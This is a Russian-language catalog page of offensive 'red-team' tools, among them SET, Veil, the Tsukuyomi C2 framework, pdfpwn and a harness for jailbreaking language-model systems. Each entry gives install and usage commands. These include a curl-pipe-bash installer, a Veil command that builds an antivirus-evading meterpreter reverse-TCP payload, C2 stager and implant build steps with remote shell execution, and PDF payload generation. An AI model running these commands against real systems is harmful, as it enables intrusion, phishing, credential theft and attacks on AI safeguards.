Каталог инструментов

31 инструментов

Тег: red-team ×
Exploitation

SET — комплексный фреймворк для атак социальной инженерии. Включает Spear-Phishing, веб-атаки (credential harvesting, tabnabbing), создание вредоносных payload-ов, SMS-спуфинг и QR-код атаки. Входит в Kali Linux.

# Kali Linux (предустановлен): sudo setoolkit # Установка из исходников: git clone https://github.com/trustedsec/social-engineer-toolkit cd social-engineer-toolkit pip3 install -r requirements.txt sudo python3 setoolkit

T3MP3ST

Exploitation

Открытый мультиагентный оркестратор для наступательной безопасности, координирующий несколько AI-агентов через восьмиэтапную цепочку операций для автономной разведки, эксплуатации и подготовки отчётов в рамках red-team автоматизации.

npm install npm run server

TTPForge

v1.5.0
Exploitation

Фреймворк для описания, автоматизации и выполнения тактик и техник, согласованных с MITRE ATT&CK.

curl \ https://raw.githubusercontent.com/facebookincubator/TTPForge/main/dl-rl.sh \ | bash export PATH=$HOME/.local/bin:$PATH ttpforge init ttpforge list repos ttpforge list ttps ttpforge show ttp examples//args/basic.yaml ttpforge run examples//args/basic.yaml \ --arg str_to_print=hello \ --arg run_second_step=true

Tsukuyomi

v0.4.2
Exploitation

C2-фреймворк на Rust для Linux x86_64 и Windows x86_64. Реализует staged-доставку: стейджер (Mikazuki) выходит на связь по HTTPS, замещает себя в памяти полным имплантом (Mangetsu), который берёт на …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Tsukuyomi.git cd Tsukuyomi cargo build --release # Запуск (однобинарный лаунчер: поднимает сервер + консоль) ./target/release/tsukuyomi # В консольном REPL: # build stager -- компилирует стейджер (Linux + Windows), запрашивает URL C2 # build implant -- компилирует имплант (Linux + Windows) # build all -- стейджер + имплант # sessions -- список активных сессий # interact 1 -- подключиться к сессии #1 # shell id=1 whoami -- выполнить команду на цели # Схема: стейджер → HTTPS → сервер → замена в памяти → имплант # Имплант остаётся только в RAM; TLS-пиннинг бакается при сборке

Veil

v3.1.14
Exploitation

Фреймворк для генерации payload-ов, обходящих антивирусную защиту. Veil-Evasion создаёт исполняемые файлы для Windows с шифрованием shellcode на различных языках: Python, PowerShell, C, C#. Интегрируется с Metasploit.

# Kali Linux: sudo apt install veil sudo /usr/share/veil/config/setup.sh --force --silent veil # Из исходников: git clone https://github.com/Veil-Framework/Veil cd Veil sudo ./config/setup.sh --force --silent sudo python3 Veil.py # Генерация payload: sudo python3 Veil.py -t Evasion -p python/meterpreter/rev_tcp.py \ --ip 192.168.1.100 --port 4444 -o payload_name

Wallbreaker

Exploitation

Терминальный харнесс с открытым исходным кодом для авторизованного red-team тестирования систем на базе языковых моделей с несколькими научно обоснованными сценариями оценки.

git clone https://github.com/JailbrokenAI/wallbreaker.git cd wallbreaker python -m venv .venv . .venv/bin/activate python -m pip install -e ".[dev,dashboard]" cp config.example.toml config.toml

pdfpwn

Post-Exploitation

Минималистичный набор bash-скриптов для запуска C2-кампании силами Red Team с минимумом инструментов: разворачивает TLS-сервер для шифрования пейлоада на канале, генерирует пейлоад внутри PDF и на целевой машине разворачивает …

git clone https://git.toolsofthetrade.qzz.io/recovered/pdfpwn.git cd pdfpwn # На атакующей машине (один раз): ./tlsserver.sh ./pdfgen.sh # На целевой машине: ./pdfpwn.sh